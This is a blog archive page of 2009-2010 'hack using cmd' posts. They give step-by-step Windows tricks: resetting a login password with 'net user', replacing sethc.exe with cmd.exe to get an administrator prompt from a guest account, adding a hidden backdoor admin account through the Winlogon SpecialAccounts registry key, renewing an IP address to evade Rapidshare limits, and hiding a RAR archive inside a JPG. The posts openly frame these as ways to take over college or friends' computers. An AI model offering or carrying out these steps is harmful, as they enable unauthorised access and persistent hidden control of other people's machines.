Showing posts with label hack using cmd. Show all posts
Showing posts with label hack using cmd. Show all posts

Friday, March 19, 2010

hack windows login password

so what if u don't know the password of your admin and still want to hack and change .. yea u can do it ..in a very easy manner.. check this. just follow the steps.. this doesn't require u to know the admin password but still u can change it..

  open your command prompt
[type] net user(press enter)
[type] net user [windowsloginid] (without bracrt) *(type star after space)(press enter)

// for e.g. : net user abhishek *(press enter)

[type] new password (press enter) and retype it (press enter).. it will show u confirmation... // caution it wont show u the password u type.. but it still types.. the blinking pointer will b there at the same place.. but it still works..
// for e.g. : password changed successfully.


well.. this is so easy and can b done within seconds.. anyways enjoy

Saturday, October 10, 2009

Hack administrator password through guest login

Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites
Guest account with write access to system 32.




Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have hacked admin through guest account.

Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where "How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new "DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)

Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Monday, July 20, 2009

Solution : Rapidshare Download Trick

Many peoples have lots of problem in downloading from Rapidshare.
this post is specially for my broadband user friends.

1. Click Start
2. Click run
3. In the run box type "cmd" (without quotes)and click OK
4. When the command prompt opens type the following and hit enter after every new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Explanation : As all Broadband users has dynamic ip they can simply change their ip address. by the commands mentioned above.


If you are bore of typing this much Command then simply make a batch file.
Creating a Batch file.
Open a notepad. type following in it.

@echo off
ipconfig /flushdns
ipconfig /release
ipconfig /renew
@echo on

Save this file with name you like and the extension as bat.
now simply execute this file.
Enjoy the Download.

Hide files using Winrar and an JPG image

By using this trick, you can hide your files in a rar file, but it looks like a picture.

For this you need
Winrar and a Picture to show instead the hidden file.


Steps:

1. Make a New Folder in any one drive, rename it to HIDDEN (you can put name of your wish).
Let it be in C drive, so that its address is C:\HIDDEN\

2. Copy all your secret files to that folder.
Select all the files.
Right click and select "Add to HIDDEN.rar" , here HIDDEN is the name that you gave to that folder created in first step.

3. Delete all files, except the created HIDDEN.rar file.

4. Copy an image to that folder. Let its name be taken as pic.jpg. This picture is used to hide the Winrar file that we made.

5. Now open Command Prompt. (Start > Run > cmd )

6. Change the prompt to C:\HIDDEN\ .
To do that, in cmd, first type cd c:\HIDDEN\ (works only if that folder is in windows (C:) drive).
If that folder is created in other drive like D:, then firts type D: ad press enter, then type cd D:\HIDDEN\.

7. Now type the following:
COPY /b pic.jpg + hidden.rar picture.jpg


8. That creates a picture that looks same as pic.jpg in HIDDEN folder.
This picture.jpg contains all your files.

To get your rar file, just change the extension .jpg of picture.jpg to .rar , and open it.
To hide, change the extension back to .jpg